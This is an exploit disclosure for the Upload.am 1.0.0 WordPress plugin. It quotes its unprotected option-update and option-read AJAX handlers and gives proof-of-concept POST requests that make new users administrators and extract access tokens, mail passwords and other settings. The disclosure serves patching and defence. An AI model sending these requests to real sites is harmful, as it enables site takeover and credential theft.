# Exploit Title: Upload.am 1.0.0 WordPress Plugin - Multiple Vulnerabilities # Date: Aug 12, 2025 # Exploit Author: bRpsd cy[at]live.no # Vendor Homepage: https://wordpress.org/plugins/upload-am-file-hosting-vpn/ # Version: <= 1.0.0 # Tested on: MacOS, localhost xampp # Authentication required: Low privilege Critical: Unauthorized Settings Modification (CWE-862) CVE-ID: N/A CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H) Affected File: upload-am-file-hosting-vpn.php:283-291 Vulnerable Code: 283: add_action('wp_ajax_upload_am_update_option', function () { 284: check_ajax_referer('upload_am_nonce', 'nonce'); 285: if (!isset($_POST['option_name']) || !isset($_POST['option_value'])) { 286: wp_send_json_error(['message' => 'Missing required parameters']); 287: } 288: $option_name = sanitize_text_field(wp_unslash($_POST['option_name'])); 289: $option_value = sanitize_text_field(wp_unslash($_POST['option_value'])); 290: update_option($option_name, $option_value); 291: wp_send_json_success(['message' => 'Option updated']); Input Source: Parameter: $_POST['option_name'] and $_POST['option_value'] Flow: User input -> sanitize_text_field() -> update_option() with no capability check Impact: Complete WordPress configuration control allowing: Privilege escalation (setting default_role to administrator) Site takeover (modifying admin_email, siteurl) Security bypass (disabling security plugins via active_plugins option) Malicious redirections and content injection POC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Cookie: wordpress_logged_in_xxx=value action=upload_am_update_option&option_name=default_role&option_value=administrator&nonce=VALID_NONCE_HERE ============================================================================================================ High: Sensitive Information Disclosure (CWE-200) CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) Affected File: upload-am-file-hosting-vpn.php:275-281 Vulnerable Code: 275: add_action('wp_ajax_upload_am_get_option', function () { 276: check_ajax_referer('upload_am_nonce', 'nonce'); 277: if (!isset($_POST['option_name'])) { 278: wp_send_json_error(['message' => 'Missing option_name']); 279: } 280: $option_name = sanitize_text_field(wp_unslash($_POST['option_name'])); 281: $value = get_option($option_name); 282: wp_send_json_success($value); Parameter: $_POST['option_name'] Flow: User input -> sanitize_text_field() -> get_option() -> JSON response POC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Cookie: wordpress_logged_in_xxx=value action=upload_am_get_option&option_name=upload_am_access_token&nonce=VALID_NONCE_HERE Additional sensitive options that can be extracted: option_name=mailserver_login option_name=mailserver_pass # Site configuration option_name=admin_email option_name=users_can_register option_name=active_plugins option_name=siteurl option_name=home # Authentication tokens option_name=upload_am_access_token option_name=upload_am_refresh_token Impact: Exposure of sensitive WordPress configuration including: API tokens and credentials Plugin/theme configuration Administrative email addresses Site URLs and security settings